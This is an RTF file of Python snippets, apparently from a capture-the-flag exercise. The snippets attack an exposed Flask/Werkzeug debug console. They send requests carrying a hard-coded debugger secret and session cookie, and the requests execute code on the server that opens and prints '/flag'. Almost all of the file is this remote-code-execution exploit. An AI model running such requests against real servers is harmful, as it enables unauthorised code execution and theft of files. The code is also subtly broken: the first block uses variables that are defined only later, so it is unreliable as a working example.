{\rtf1\ansi\ansicpg950\cocoartf2580
\cocoatextscaling0\cocoaplatform0{\fonttbl\f0\fswiss\fcharset0 Helvetica;}
{\colortbl;\red255\green255\blue255;}
{\*\expandedcolortbl;;}
\paperw11900\paperh16840\margl1440\margr1440\vieww18760\viewh6580\viewkind0
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0

\f0\fs24 \cf0 \
\
secret , cookie\
\
#open file\
url_open='http://flask:5000/console/console?&__debugger__=yes&cmd=f%20%3D%20open(%27%2Fflag%27%2C%27r%27)&frm=0&s=NH1uyxSdNr7tPNRbOIYf'\
url_open_request = urllib.request.Request(url_print)\
url_open_request.add_header('Cookie' , '__wzd63f4d1edc380f80089a4=1663563879|de44e22b7281')\
url_open_response = urllib.request.urlopen(url_print_request)\
print(url_open_response.info())\
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0
\cf0 print(url_open_response.read())\
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0
\cf0 \
#print file\
\pard\tx566\tx1133\tx1700\tx2267\tx2834\tx3401\tx3968\tx4535\tx5102\tx5669\tx6236\tx6803\pardirnatural\partightenfactor0
\cf0 url_print='http://flask:5000/console/console?&__debugger__=yes&cmd=print(f.read())&frm=0&s=NH1uyxSdNr7tPNRbOIYf'\
url_print_request = urllib.request.Request(url_print)\
url_print_request.add_header('Cookie' , '__wzd63f4d1edc380f80089a4=1663563879|de44e22b7281')\
url_print_response = urllib.request.urlopen(url_print_request)\
print(url_print_response.info())\
print(url_print_response.read())\
}